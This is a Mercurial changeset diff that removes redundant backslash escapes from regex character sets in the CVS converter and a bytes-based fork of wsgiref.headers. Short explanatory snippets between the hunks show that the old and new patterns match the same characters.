cleanup: drop redundant character escapes from `[]` character sets...
Matt Harbison
r44473:6d3b67a8 default
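As a quick illustration of the rule behind this cleanup (a minimal sketch, not part of the commit): inside a `[]` character set, characters such as `(`, `)`, `?` and `/` are ordinary characters, so backslash-escaping them is redundant and dropping the escapes does not change what a pattern matches. The hunks below apply exactly this simplification to two patterns, one in cvs.py and one in the forked wsgiref.headers module.

```python
import re

# Inside a character class, '(', ')', '?' and '/' are literals, so the
# escaped and unescaped spellings compile to the same character set.
sample = 'a(b)?c/d'
assert re.findall(r'[\(\)\?/]', sample) == re.findall(r'[()?/]', sample)
print(re.findall(r'[()?/]', sample))  # ['(', ')', '?', '/']
```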
@@ -1,335 +1,333 @@
1 # cvs.py: CVS conversion code inspired by hg-cvs-import and git-cvsimport
1 # cvs.py: CVS conversion code inspired by hg-cvs-import and git-cvsimport
2 #
2 #
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 from __future__ import absolute_import
7 from __future__ import absolute_import
8
8
9 import errno
9 import errno
10 import os
10 import os
11 import re
11 import re
12 import socket
12 import socket
13
13
14 from mercurial.i18n import _
14 from mercurial.i18n import _
15 from mercurial.pycompat import (
15 from mercurial.pycompat import (
16 getattr,
16 getattr,
17 open,
17 open,
18 )
18 )
19 from mercurial import (
19 from mercurial import (
20 encoding,
20 encoding,
21 error,
21 error,
22 pycompat,
22 pycompat,
23 util,
23 util,
24 )
24 )
25 from mercurial.utils import (
25 from mercurial.utils import (
26 dateutil,
26 dateutil,
27 procutil,
27 procutil,
28 )
28 )
29
29
30 from . import (
30 from . import (
31 common,
31 common,
32 cvsps,
32 cvsps,
33 )
33 )
34
34
35 stringio = util.stringio
35 stringio = util.stringio
36 checktool = common.checktool
36 checktool = common.checktool
37 commit = common.commit
37 commit = common.commit
38 converter_source = common.converter_source
38 converter_source = common.converter_source
39 makedatetimestamp = common.makedatetimestamp
39 makedatetimestamp = common.makedatetimestamp
40 NoRepo = common.NoRepo
40 NoRepo = common.NoRepo
41
41
42
42
43 class convert_cvs(converter_source):
43 class convert_cvs(converter_source):
44 def __init__(self, ui, repotype, path, revs=None):
44 def __init__(self, ui, repotype, path, revs=None):
45 super(convert_cvs, self).__init__(ui, repotype, path, revs=revs)
45 super(convert_cvs, self).__init__(ui, repotype, path, revs=revs)
46
46
47 cvs = os.path.join(path, b"CVS")
47 cvs = os.path.join(path, b"CVS")
48 if not os.path.exists(cvs):
48 if not os.path.exists(cvs):
49 raise NoRepo(_(b"%s does not look like a CVS checkout") % path)
49 raise NoRepo(_(b"%s does not look like a CVS checkout") % path)
50
50
51 checktool(b'cvs')
51 checktool(b'cvs')
52
52
53 self.changeset = None
53 self.changeset = None
54 self.files = {}
54 self.files = {}
55 self.tags = {}
55 self.tags = {}
56 self.lastbranch = {}
56 self.lastbranch = {}
57 self.socket = None
57 self.socket = None
58 self.cvsroot = open(os.path.join(cvs, b"Root"), b'rb').read()[:-1]
58 self.cvsroot = open(os.path.join(cvs, b"Root"), b'rb').read()[:-1]
59 self.cvsrepo = open(os.path.join(cvs, b"Repository"), b'rb').read()[:-1]
59 self.cvsrepo = open(os.path.join(cvs, b"Repository"), b'rb').read()[:-1]
60 self.encoding = encoding.encoding
60 self.encoding = encoding.encoding
61
61
62 self._connect()
62 self._connect()
63
63
64 def _parse(self):
64 def _parse(self):
65 if self.changeset is not None:
65 if self.changeset is not None:
66 return
66 return
67 self.changeset = {}
67 self.changeset = {}
68
68
69 maxrev = 0
69 maxrev = 0
70 if self.revs:
70 if self.revs:
71 if len(self.revs) > 1:
71 if len(self.revs) > 1:
72 raise error.Abort(
72 raise error.Abort(
73 _(
73 _(
74 b'cvs source does not support specifying '
74 b'cvs source does not support specifying '
75 b'multiple revs'
75 b'multiple revs'
76 )
76 )
77 )
77 )
78 # TODO: handle tags
78 # TODO: handle tags
79 try:
79 try:
80 # patchset number?
80 # patchset number?
81 maxrev = int(self.revs[0])
81 maxrev = int(self.revs[0])
82 except ValueError:
82 except ValueError:
83 raise error.Abort(
83 raise error.Abort(
84 _(b'revision %s is not a patchset number') % self.revs[0]
84 _(b'revision %s is not a patchset number') % self.revs[0]
85 )
85 )
86
86
87 d = encoding.getcwd()
87 d = encoding.getcwd()
88 try:
88 try:
89 os.chdir(self.path)
89 os.chdir(self.path)
90
90
91 cache = b'update'
91 cache = b'update'
92 if not self.ui.configbool(b'convert', b'cvsps.cache'):
92 if not self.ui.configbool(b'convert', b'cvsps.cache'):
93 cache = None
93 cache = None
94 db = cvsps.createlog(self.ui, cache=cache)
94 db = cvsps.createlog(self.ui, cache=cache)
95 db = cvsps.createchangeset(
95 db = cvsps.createchangeset(
96 self.ui,
96 self.ui,
97 db,
97 db,
98 fuzz=int(self.ui.config(b'convert', b'cvsps.fuzz')),
98 fuzz=int(self.ui.config(b'convert', b'cvsps.fuzz')),
99 mergeto=self.ui.config(b'convert', b'cvsps.mergeto'),
99 mergeto=self.ui.config(b'convert', b'cvsps.mergeto'),
100 mergefrom=self.ui.config(b'convert', b'cvsps.mergefrom'),
100 mergefrom=self.ui.config(b'convert', b'cvsps.mergefrom'),
101 )
101 )
102
102
103 for cs in db:
103 for cs in db:
104 if maxrev and cs.id > maxrev:
104 if maxrev and cs.id > maxrev:
105 break
105 break
106 id = b"%d" % cs.id
106 id = b"%d" % cs.id
107 cs.author = self.recode(cs.author)
107 cs.author = self.recode(cs.author)
108 self.lastbranch[cs.branch] = id
108 self.lastbranch[cs.branch] = id
109 cs.comment = self.recode(cs.comment)
109 cs.comment = self.recode(cs.comment)
110 if self.ui.configbool(b'convert', b'localtimezone'):
110 if self.ui.configbool(b'convert', b'localtimezone'):
111 cs.date = makedatetimestamp(cs.date[0])
111 cs.date = makedatetimestamp(cs.date[0])
112 date = dateutil.datestr(cs.date, b'%Y-%m-%d %H:%M:%S %1%2')
112 date = dateutil.datestr(cs.date, b'%Y-%m-%d %H:%M:%S %1%2')
113 self.tags.update(dict.fromkeys(cs.tags, id))
113 self.tags.update(dict.fromkeys(cs.tags, id))
114
114
115 files = {}
115 files = {}
116 for f in cs.entries:
116 for f in cs.entries:
117 files[f.file] = b"%s%s" % (
117 files[f.file] = b"%s%s" % (
118 b'.'.join([(b"%d" % x) for x in f.revision]),
118 b'.'.join([(b"%d" % x) for x in f.revision]),
119 [b'', b'(DEAD)'][f.dead],
119 [b'', b'(DEAD)'][f.dead],
120 )
120 )
121
121
122 # add current commit to set
122 # add current commit to set
123 c = commit(
123 c = commit(
124 author=cs.author,
124 author=cs.author,
125 date=date,
125 date=date,
126 parents=[(b"%d" % p.id) for p in cs.parents],
126 parents=[(b"%d" % p.id) for p in cs.parents],
127 desc=cs.comment,
127 desc=cs.comment,
128 branch=cs.branch or b'',
128 branch=cs.branch or b'',
129 )
129 )
130 self.changeset[id] = c
130 self.changeset[id] = c
131 self.files[id] = files
131 self.files[id] = files
132
132
133 self.heads = self.lastbranch.values()
133 self.heads = self.lastbranch.values()
134 finally:
134 finally:
135 os.chdir(d)
135 os.chdir(d)
136
136
137 def _connect(self):
137 def _connect(self):
138 root = self.cvsroot
138 root = self.cvsroot
139 conntype = None
139 conntype = None
140 user, host = None, None
140 user, host = None, None
141 cmd = [b'cvs', b'server']
141 cmd = [b'cvs', b'server']
142
142
143 self.ui.status(_(b"connecting to %s\n") % root)
143 self.ui.status(_(b"connecting to %s\n") % root)
144
144
145 if root.startswith(b":pserver:"):
145 if root.startswith(b":pserver:"):
146 root = root[9:]
146 root = root[9:]
147 m = re.match(
148 r'(?:(.*?)(?::(.*?))?@)?([^:\/]*)(?::(\d*))?(.*)', root
149 )
147 m = re.match(r'(?:(.*?)(?::(.*?))?@)?([^:/]*)(?::(\d*))?(.*)', root)
150 if m:
148 if m:
151 conntype = b"pserver"
149 conntype = b"pserver"
152 user, passw, serv, port, root = m.groups()
150 user, passw, serv, port, root = m.groups()
153 if not user:
151 if not user:
154 user = b"anonymous"
152 user = b"anonymous"
155 if not port:
153 if not port:
156 port = 2401
154 port = 2401
157 else:
155 else:
158 port = int(port)
156 port = int(port)
159 format0 = b":pserver:%s@%s:%s" % (user, serv, root)
157 format0 = b":pserver:%s@%s:%s" % (user, serv, root)
160 format1 = b":pserver:%s@%s:%d%s" % (user, serv, port, root)
158 format1 = b":pserver:%s@%s:%d%s" % (user, serv, port, root)
161
159
162 if not passw:
160 if not passw:
163 passw = b"A"
161 passw = b"A"
164 cvspass = os.path.expanduser(b"~/.cvspass")
162 cvspass = os.path.expanduser(b"~/.cvspass")
165 try:
163 try:
166 pf = open(cvspass, b'rb')
164 pf = open(cvspass, b'rb')
167 for line in pf.read().splitlines():
165 for line in pf.read().splitlines():
168 part1, part2 = line.split(b' ', 1)
166 part1, part2 = line.split(b' ', 1)
169 # /1 :pserver:user@example.com:2401/cvsroot/foo
167 # /1 :pserver:user@example.com:2401/cvsroot/foo
170 # Ah<Z
168 # Ah<Z
171 if part1 == b'/1':
169 if part1 == b'/1':
172 part1, part2 = part2.split(b' ', 1)
170 part1, part2 = part2.split(b' ', 1)
173 format = format1
171 format = format1
174 # :pserver:user@example.com:/cvsroot/foo Ah<Z
172 # :pserver:user@example.com:/cvsroot/foo Ah<Z
175 else:
173 else:
176 format = format0
174 format = format0
177 if part1 == format:
175 if part1 == format:
178 passw = part2
176 passw = part2
179 break
177 break
180 pf.close()
178 pf.close()
181 except IOError as inst:
179 except IOError as inst:
182 if inst.errno != errno.ENOENT:
180 if inst.errno != errno.ENOENT:
183 if not getattr(inst, 'filename', None):
181 if not getattr(inst, 'filename', None):
184 inst.filename = cvspass
182 inst.filename = cvspass
185 raise
183 raise
186
184
187 sck = socket.socket()
185 sck = socket.socket()
188 sck.connect((serv, port))
186 sck.connect((serv, port))
189 sck.send(
187 sck.send(
190 b"\n".join(
188 b"\n".join(
191 [
189 [
192 b"BEGIN AUTH REQUEST",
190 b"BEGIN AUTH REQUEST",
193 root,
191 root,
194 user,
192 user,
195 passw,
193 passw,
196 b"END AUTH REQUEST",
194 b"END AUTH REQUEST",
197 b"",
195 b"",
198 ]
196 ]
199 )
197 )
200 )
198 )
201 if sck.recv(128) != b"I LOVE YOU\n":
199 if sck.recv(128) != b"I LOVE YOU\n":
202 raise error.Abort(_(b"CVS pserver authentication failed"))
200 raise error.Abort(_(b"CVS pserver authentication failed"))
203
201
204 self.writep = self.readp = sck.makefile(b'r+')
202 self.writep = self.readp = sck.makefile(b'r+')
205
203
206 if not conntype and root.startswith(b":local:"):
204 if not conntype and root.startswith(b":local:"):
207 conntype = b"local"
205 conntype = b"local"
208 root = root[7:]
206 root = root[7:]
209
207
210 if not conntype:
208 if not conntype:
211 # :ext:user@host/home/user/path/to/cvsroot
209 # :ext:user@host/home/user/path/to/cvsroot
212 if root.startswith(b":ext:"):
210 if root.startswith(b":ext:"):
213 root = root[5:]
211 root = root[5:]
214 m = re.match(br'(?:([^@:/]+)@)?([^:/]+):?(.*)', root)
212 m = re.match(br'(?:([^@:/]+)@)?([^:/]+):?(.*)', root)
215 # Do not take Windows path "c:\foo\bar" as a connection string
213 # Do not take Windows path "c:\foo\bar" as a connection string
216 if os.path.isdir(root) or not m:
214 if os.path.isdir(root) or not m:
217 conntype = b"local"
215 conntype = b"local"
218 else:
216 else:
219 conntype = b"rsh"
217 conntype = b"rsh"
220 user, host, root = m.group(1), m.group(2), m.group(3)
218 user, host, root = m.group(1), m.group(2), m.group(3)
221
219
222 if conntype != b"pserver":
220 if conntype != b"pserver":
223 if conntype == b"rsh":
221 if conntype == b"rsh":
224 rsh = encoding.environ.get(b"CVS_RSH") or b"ssh"
222 rsh = encoding.environ.get(b"CVS_RSH") or b"ssh"
225 if user:
223 if user:
226 cmd = [rsh, b'-l', user, host] + cmd
224 cmd = [rsh, b'-l', user, host] + cmd
227 else:
225 else:
228 cmd = [rsh, host] + cmd
226 cmd = [rsh, host] + cmd
229
227
230 # popen2 does not support argument lists under Windows
228 # popen2 does not support argument lists under Windows
231 cmd = [procutil.shellquote(arg) for arg in cmd]
229 cmd = [procutil.shellquote(arg) for arg in cmd]
232 cmd = procutil.quotecommand(b' '.join(cmd))
230 cmd = procutil.quotecommand(b' '.join(cmd))
233 self.writep, self.readp = procutil.popen2(cmd)
231 self.writep, self.readp = procutil.popen2(cmd)
234
232
235 self.realroot = root
233 self.realroot = root
236
234
237 self.writep.write(b"Root %s\n" % root)
235 self.writep.write(b"Root %s\n" % root)
238 self.writep.write(
236 self.writep.write(
239 b"Valid-responses ok error Valid-requests Mode"
237 b"Valid-responses ok error Valid-requests Mode"
240 b" M Mbinary E Checked-in Created Updated"
238 b" M Mbinary E Checked-in Created Updated"
241 b" Merged Removed\n"
239 b" Merged Removed\n"
242 )
240 )
243 self.writep.write(b"valid-requests\n")
241 self.writep.write(b"valid-requests\n")
244 self.writep.flush()
242 self.writep.flush()
245 r = self.readp.readline()
243 r = self.readp.readline()
246 if not r.startswith(b"Valid-requests"):
244 if not r.startswith(b"Valid-requests"):
247 raise error.Abort(
245 raise error.Abort(
248 _(
246 _(
249 b'unexpected response from CVS server '
247 b'unexpected response from CVS server '
250 b'(expected "Valid-requests", but got %r)'
248 b'(expected "Valid-requests", but got %r)'
251 )
249 )
252 % r
250 % r
253 )
251 )
254 if b"UseUnchanged" in r:
252 if b"UseUnchanged" in r:
255 self.writep.write(b"UseUnchanged\n")
253 self.writep.write(b"UseUnchanged\n")
256 self.writep.flush()
254 self.writep.flush()
257 self.readp.readline()
255 self.readp.readline()
258
256
259 def getheads(self):
257 def getheads(self):
260 self._parse()
258 self._parse()
261 return self.heads
259 return self.heads
262
260
263 def getfile(self, name, rev):
261 def getfile(self, name, rev):
264 def chunkedread(fp, count):
262 def chunkedread(fp, count):
265 # file-objects returned by socket.makefile() do not handle
263 # file-objects returned by socket.makefile() do not handle
266 # large read() requests very well.
264 # large read() requests very well.
267 chunksize = 65536
265 chunksize = 65536
268 output = stringio()
266 output = stringio()
269 while count > 0:
267 while count > 0:
270 data = fp.read(min(count, chunksize))
268 data = fp.read(min(count, chunksize))
271 if not data:
269 if not data:
272 raise error.Abort(
270 raise error.Abort(
273 _(b"%d bytes missing from remote file") % count
271 _(b"%d bytes missing from remote file") % count
274 )
272 )
275 count -= len(data)
273 count -= len(data)
276 output.write(data)
274 output.write(data)
277 return output.getvalue()
275 return output.getvalue()
278
276
279 self._parse()
277 self._parse()
280 if rev.endswith(b"(DEAD)"):
278 if rev.endswith(b"(DEAD)"):
281 return None, None
279 return None, None
282
280
283 args = (b"-N -P -kk -r %s --" % rev).split()
281 args = (b"-N -P -kk -r %s --" % rev).split()
284 args.append(self.cvsrepo + b'/' + name)
282 args.append(self.cvsrepo + b'/' + name)
285 for x in args:
283 for x in args:
286 self.writep.write(b"Argument %s\n" % x)
284 self.writep.write(b"Argument %s\n" % x)
287 self.writep.write(b"Directory .\n%s\nco\n" % self.realroot)
285 self.writep.write(b"Directory .\n%s\nco\n" % self.realroot)
288 self.writep.flush()
286 self.writep.flush()
289
287
290 data = b""
288 data = b""
291 mode = None
289 mode = None
292 while True:
290 while True:
293 line = self.readp.readline()
291 line = self.readp.readline()
294 if line.startswith(b"Created ") or line.startswith(b"Updated "):
292 if line.startswith(b"Created ") or line.startswith(b"Updated "):
295 self.readp.readline() # path
293 self.readp.readline() # path
296 self.readp.readline() # entries
294 self.readp.readline() # entries
297 mode = self.readp.readline()[:-1]
295 mode = self.readp.readline()[:-1]
298 count = int(self.readp.readline()[:-1])
296 count = int(self.readp.readline()[:-1])
299 data = chunkedread(self.readp, count)
297 data = chunkedread(self.readp, count)
300 elif line.startswith(b" "):
298 elif line.startswith(b" "):
301 data += line[1:]
299 data += line[1:]
302 elif line.startswith(b"M "):
300 elif line.startswith(b"M "):
303 pass
301 pass
304 elif line.startswith(b"Mbinary "):
302 elif line.startswith(b"Mbinary "):
305 count = int(self.readp.readline()[:-1])
303 count = int(self.readp.readline()[:-1])
306 data = chunkedread(self.readp, count)
304 data = chunkedread(self.readp, count)
307 else:
305 else:
308 if line == b"ok\n":
306 if line == b"ok\n":
309 if mode is None:
307 if mode is None:
310 raise error.Abort(_(b'malformed response from CVS'))
308 raise error.Abort(_(b'malformed response from CVS'))
311 return (data, b"x" in mode and b"x" or b"")
309 return (data, b"x" in mode and b"x" or b"")
312 elif line.startswith(b"E "):
310 elif line.startswith(b"E "):
313 self.ui.warn(_(b"cvs server: %s\n") % line[2:])
311 self.ui.warn(_(b"cvs server: %s\n") % line[2:])
314 elif line.startswith(b"Remove"):
312 elif line.startswith(b"Remove"):
315 self.readp.readline()
313 self.readp.readline()
316 else:
314 else:
317 raise error.Abort(_(b"unknown CVS response: %s") % line)
315 raise error.Abort(_(b"unknown CVS response: %s") % line)
318
316
319 def getchanges(self, rev, full):
317 def getchanges(self, rev, full):
320 if full:
318 if full:
321 raise error.Abort(_(b"convert from cvs does not support --full"))
319 raise error.Abort(_(b"convert from cvs does not support --full"))
322 self._parse()
320 self._parse()
323 return sorted(pycompat.iteritems(self.files[rev])), {}, set()
321 return sorted(pycompat.iteritems(self.files[rev])), {}, set()
324
322
325 def getcommit(self, rev):
323 def getcommit(self, rev):
326 self._parse()
324 self._parse()
327 return self.changeset[rev]
325 return self.changeset[rev]
328
326
329 def gettags(self):
327 def gettags(self):
330 self._parse()
328 self._parse()
331 return self.tags
329 return self.tags
332
330
333 def getchangedfiles(self, rev, i):
331 def getchangedfiles(self, rev, i):
334 self._parse()
332 self._parse()
335 return sorted(self.files[rev])
333 return sorted(self.files[rev])
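As a sanity check on the hunk above, a short sketch (the `:pserver:` root and host below are made up, not from the commit) showing that the old `[^:\/]*` and the new `[^:/]*` describe the same "anything but ':' or '/'" class, so the captured user/host/port/path groups are identical:

```python
import re

# Hypothetical CVS root in the format handled by _connect() above.
root = b':pserver:anonymous@cvs.example.org:2401/cvsroot/foo'[len(b':pserver:'):]

old = re.match(br'(?:(.*?)(?::(.*?))?@)?([^:\/]*)(?::(\d*))?(.*)', root)
new = re.match(br'(?:(.*?)(?::(.*?))?@)?([^:/]*)(?::(\d*))?(.*)', root)

# Dropping the redundant escape does not change the parse.
assert old.groups() == new.groups()
print(new.groups())
# (b'anonymous', None, b'cvs.example.org', b'2401', b'/cvsroot/foo')
```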
@@ -1,185 +1,185 @@
1 """This was forked from cpython's wsgiref.headers module to work on bytes.
1 """This was forked from cpython's wsgiref.headers module to work on bytes.
2
2
3 Header from old file showing copyright is below.
3 Header from old file showing copyright is below.
4
4
5 Much of this module is red-handedly pilfered from email.message in the stdlib,
5 Much of this module is red-handedly pilfered from email.message in the stdlib,
6 so portions are Copyright (C) 2001,2002 Python Software Foundation, and were
6 so portions are Copyright (C) 2001,2002 Python Software Foundation, and were
7 written by Barry Warsaw.
7 written by Barry Warsaw.
8 """
8 """
9
9
10 # Regular expression that matches `special' characters in parameters, the
10 # Regular expression that matches `special' characters in parameters, the
11 # existence of which force quoting of the parameter value.
11 # existence of which force quoting of the parameter value.
12 from __future__ import absolute_import, print_function
12 from __future__ import absolute_import, print_function
13
13
14 import re
14 import re
15
15
16 tspecials = re.compile(br'[ \(\)<>@,;:\\"/\[\]\?=]')
16 tspecials = re.compile(br'[ ()<>@,;:\\"/\[\]?=]')
17
17
18
18
19 def _formatparam(param, value=None, quote=1):
19 def _formatparam(param, value=None, quote=1):
20 """Convenience function to format and return a key=value pair.
20 """Convenience function to format and return a key=value pair.
21 This will quote the value if needed or if quote is true.
21 This will quote the value if needed or if quote is true.
22 """
22 """
23 if value is not None and len(value) > 0:
23 if value is not None and len(value) > 0:
24 if quote or tspecials.search(value):
24 if quote or tspecials.search(value):
25 value = value.replace(b'\\', b'\\\\').replace(b'"', r'\"')
25 value = value.replace(b'\\', b'\\\\').replace(b'"', r'\"')
26 return b'%s="%s"' % (param, value)
26 return b'%s="%s"' % (param, value)
27 else:
27 else:
28 return b'%s=%s' % (param, value)
28 return b'%s=%s' % (param, value)
29 else:
29 else:
30 return param
30 return param
31
31
32
32
33 class Headers(object):
33 class Headers(object):
34 """Manage a collection of HTTP response headers"""
34 """Manage a collection of HTTP response headers"""
35
35
36 def __init__(self, headers=None):
36 def __init__(self, headers=None):
37 headers = headers if headers is not None else []
37 headers = headers if headers is not None else []
38 if type(headers) is not list:
38 if type(headers) is not list:
39 raise TypeError(b"Headers must be a list of name/value tuples")
39 raise TypeError(b"Headers must be a list of name/value tuples")
40 self._headers = headers
40 self._headers = headers
41 if __debug__:
41 if __debug__:
42 for k, v in headers:
42 for k, v in headers:
43 self._convert_string_type(k)
43 self._convert_string_type(k)
44 self._convert_string_type(v)
44 self._convert_string_type(v)
45
45
46 def _convert_string_type(self, value):
46 def _convert_string_type(self, value):
47 """Convert/check value type."""
47 """Convert/check value type."""
48 if type(value) is bytes:
48 if type(value) is bytes:
49 return value
49 return value
50 raise AssertionError(
50 raise AssertionError(
51 u"Header names/values must be"
51 u"Header names/values must be"
52 u" of type bytes (got %s)" % repr(value)
52 u" of type bytes (got %s)" % repr(value)
53 )
53 )
54
54
55 def __len__(self):
55 def __len__(self):
56 """Return the total number of headers, including duplicates."""
56 """Return the total number of headers, including duplicates."""
57 return len(self._headers)
57 return len(self._headers)
58
58
59 def __setitem__(self, name, val):
59 def __setitem__(self, name, val):
60 """Set the value of a header."""
60 """Set the value of a header."""
61 del self[name]
61 del self[name]
62 self._headers.append(
62 self._headers.append(
63 (self._convert_string_type(name), self._convert_string_type(val))
63 (self._convert_string_type(name), self._convert_string_type(val))
64 )
64 )
65
65
66 def __delitem__(self, name):
66 def __delitem__(self, name):
67 """Delete all occurrences of a header, if present.
67 """Delete all occurrences of a header, if present.
68 Does *not* raise an exception if the header is missing.
68 Does *not* raise an exception if the header is missing.
69 """
69 """
70 name = self._convert_string_type(name.lower())
70 name = self._convert_string_type(name.lower())
71 self._headers[:] = [kv for kv in self._headers if kv[0].lower() != name]
71 self._headers[:] = [kv for kv in self._headers if kv[0].lower() != name]
72
72
73 def __getitem__(self, name):
73 def __getitem__(self, name):
74 """Get the first header value for 'name'
74 """Get the first header value for 'name'
75 Return None if the header is missing instead of raising an exception.
75 Return None if the header is missing instead of raising an exception.
76 Note that if the header appeared multiple times, exactly which
76 Note that if the header appeared multiple times, exactly which
77 occurrence gets returned is undefined. Use getall() to get all
77 occurrence gets returned is undefined. Use getall() to get all
78 the values matching a header field name.
78 the values matching a header field name.
79 """
79 """
80 return self.get(name)
80 return self.get(name)
81
81
82 def __contains__(self, name):
82 def __contains__(self, name):
83 """Return true if the message contains the header."""
83 """Return true if the message contains the header."""
84 return self.get(name) is not None
84 return self.get(name) is not None
85
85
86 def get_all(self, name):
86 def get_all(self, name):
87 """Return a list of all the values for the named field.
87 """Return a list of all the values for the named field.
88 These will be sorted in the order they appeared in the original header
88 These will be sorted in the order they appeared in the original header
89 list or were added to this instance, and may contain duplicates. Any
89 list or were added to this instance, and may contain duplicates. Any
90 fields deleted and re-inserted are always appended to the header list.
90 fields deleted and re-inserted are always appended to the header list.
91 If no fields exist with the given name, returns an empty list.
91 If no fields exist with the given name, returns an empty list.
92 """
92 """
93 name = self._convert_string_type(name.lower())
93 name = self._convert_string_type(name.lower())
94 return [kv[1] for kv in self._headers if kv[0].lower() == name]
94 return [kv[1] for kv in self._headers if kv[0].lower() == name]
95
95
96 def get(self, name, default=None):
96 def get(self, name, default=None):
97 """Get the first header value for 'name', or return 'default'"""
97 """Get the first header value for 'name', or return 'default'"""
98 name = self._convert_string_type(name.lower())
98 name = self._convert_string_type(name.lower())
99 for k, v in self._headers:
99 for k, v in self._headers:
100 if k.lower() == name:
100 if k.lower() == name:
101 return v
101 return v
102 return default
102 return default
103
103
104 def keys(self):
104 def keys(self):
105 """Return a list of all the header field names.
105 """Return a list of all the header field names.
106 These will be sorted in the order they appeared in the original header
106 These will be sorted in the order they appeared in the original header
107 list, or were added to this instance, and may contain duplicates.
107 list, or were added to this instance, and may contain duplicates.
108 Any fields deleted and re-inserted are always appended to the header
108 Any fields deleted and re-inserted are always appended to the header
109 list.
109 list.
110 """
110 """
111 return [k for k, v in self._headers]
111 return [k for k, v in self._headers]
112
112
113 def values(self):
113 def values(self):
114 """Return a list of all header values.
114 """Return a list of all header values.
115 These will be sorted in the order they appeared in the original header
115 These will be sorted in the order they appeared in the original header
116 list, or were added to this instance, and may contain duplicates.
116 list, or were added to this instance, and may contain duplicates.
117 Any fields deleted and re-inserted are always appended to the header
117 Any fields deleted and re-inserted are always appended to the header
118 list.
118 list.
119 """
119 """
120 return [v for k, v in self._headers]
120 return [v for k, v in self._headers]
121
121
122 def items(self):
122 def items(self):
123 """Get all the header fields and values.
123 """Get all the header fields and values.
124 These will be sorted in the order they were in the original header
124 These will be sorted in the order they were in the original header
125 list, or were added to this instance, and may contain duplicates.
125 list, or were added to this instance, and may contain duplicates.
126 Any fields deleted and re-inserted are always appended to the header
126 Any fields deleted and re-inserted are always appended to the header
127 list.
127 list.
128 """
128 """
129 return self._headers[:]
129 return self._headers[:]
130
130
131 def __repr__(self):
131 def __repr__(self):
132 return "%s(%r)" % (self.__class__.__name__, self._headers)
132 return "%s(%r)" % (self.__class__.__name__, self._headers)
133
133
134 def __str__(self):
134 def __str__(self):
135 """str() returns the formatted headers, complete with end line,
135 """str() returns the formatted headers, complete with end line,
136 suitable for direct HTTP transmission."""
136 suitable for direct HTTP transmission."""
137 return b'\r\n'.join(
137 return b'\r\n'.join(
138 [b"%s: %s" % kv for kv in self._headers] + [b'', b'']
138 [b"%s: %s" % kv for kv in self._headers] + [b'', b'']
139 )
139 )
140
140
141 def __bytes__(self):
141 def __bytes__(self):
142 return str(self).encode('iso-8859-1')
142 return str(self).encode('iso-8859-1')
143
143
144 def setdefault(self, name, value):
144 def setdefault(self, name, value):
145 """Return first matching header value for 'name', or 'value'
145 """Return first matching header value for 'name', or 'value'
146 If there is no header named 'name', add a new header with name 'name'
146 If there is no header named 'name', add a new header with name 'name'
147 and value 'value'."""
147 and value 'value'."""
148 result = self.get(name)
148 result = self.get(name)
149 if result is None:
149 if result is None:
150 self._headers.append(
150 self._headers.append(
151 (
151 (
152 self._convert_string_type(name),
152 self._convert_string_type(name),
153 self._convert_string_type(value),
153 self._convert_string_type(value),
154 )
154 )
155 )
155 )
156 return value
156 return value
157 else:
157 else:
158 return result
158 return result
159
159
160 def add_header(self, _name, _value, **_params):
160 def add_header(self, _name, _value, **_params):
161 """Extended header setting.
161 """Extended header setting.
162 _name is the header field to add. keyword arguments can be used to set
162 _name is the header field to add. keyword arguments can be used to set
163 additional parameters for the header field, with underscores converted
163 additional parameters for the header field, with underscores converted
164 to dashes. Normally the parameter will be added as key="value" unless
164 to dashes. Normally the parameter will be added as key="value" unless
165 value is None, in which case only the key will be added.
165 value is None, in which case only the key will be added.
166 Example:
166 Example:
167 h.add_header('content-disposition', 'attachment', filename='bud.gif')
167 h.add_header('content-disposition', 'attachment', filename='bud.gif')
168 Note that unlike the corresponding 'email.message' method, this does
168 Note that unlike the corresponding 'email.message' method, this does
169 *not* handle '(charset, language, value)' tuples: all values must be
169 *not* handle '(charset, language, value)' tuples: all values must be
170 strings or None.
170 strings or None.
171 """
171 """
172 parts = []
172 parts = []
173 if _value is not None:
173 if _value is not None:
174 _value = self._convert_string_type(_value)
174 _value = self._convert_string_type(_value)
175 parts.append(_value)
175 parts.append(_value)
176 for k, v in _params.items():
176 for k, v in _params.items():
177 k = self._convert_string_type(k)
177 k = self._convert_string_type(k)
178 if v is None:
178 if v is None:
179 parts.append(k.replace(b'_', b'-'))
179 parts.append(k.replace(b'_', b'-'))
180 else:
180 else:
181 v = self._convert_string_type(v)
181 v = self._convert_string_type(v)
182 parts.append(_formatparam(k.replace(b'_', b'-'), v))
182 parts.append(_formatparam(k.replace(b'_', b'-'), v))
183 self._headers.append(
183 self._headers.append(
184 (self._convert_string_type(_name), b"; ".join(parts))
184 (self._convert_string_type(_name), b"; ".join(parts))
185 )
185 )
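And for the `tspecials` change above, a small check (the sample value is made up) that the escaped and unescaped spellings match exactly the same characters, so the quoting decision made by `_formatparam` is unchanged:

```python
import re

# Old and new spellings of tspecials from the hunk above; the escapes on
# '(', ')' and '?' inside [] are redundant, so both patterns are equivalent.
tspecials_old = re.compile(br'[ \(\)<>@,;:\\"/\[\]\?=]')
tspecials_new = re.compile(br'[ ()<>@,;:\\"/\[\]?=]')

value = b'bud (final?).gif'  # arbitrary value containing special characters
assert tspecials_old.findall(value) == tspecials_new.findall(value)
assert tspecials_new.search(value) is not None  # would still be quoted
```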
@@ -1,2312 +1,2312 @@
1 # ui.py - user interface bits for mercurial
1 # ui.py - user interface bits for mercurial
2 #
2 #
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import collections
10 import collections
11 import contextlib
11 import contextlib
12 import errno
12 import errno
13 import getpass
13 import getpass
14 import inspect
14 import inspect
15 import os
15 import os
16 import re
16 import re
17 import signal
17 import signal
18 import socket
18 import socket
19 import subprocess
19 import subprocess
20 import sys
20 import sys
21 import traceback
21 import traceback
22
22
23 from .i18n import _
23 from .i18n import _
24 from .node import hex
24 from .node import hex
25 from .pycompat import (
25 from .pycompat import (
26 getattr,
26 getattr,
27 open,
27 open,
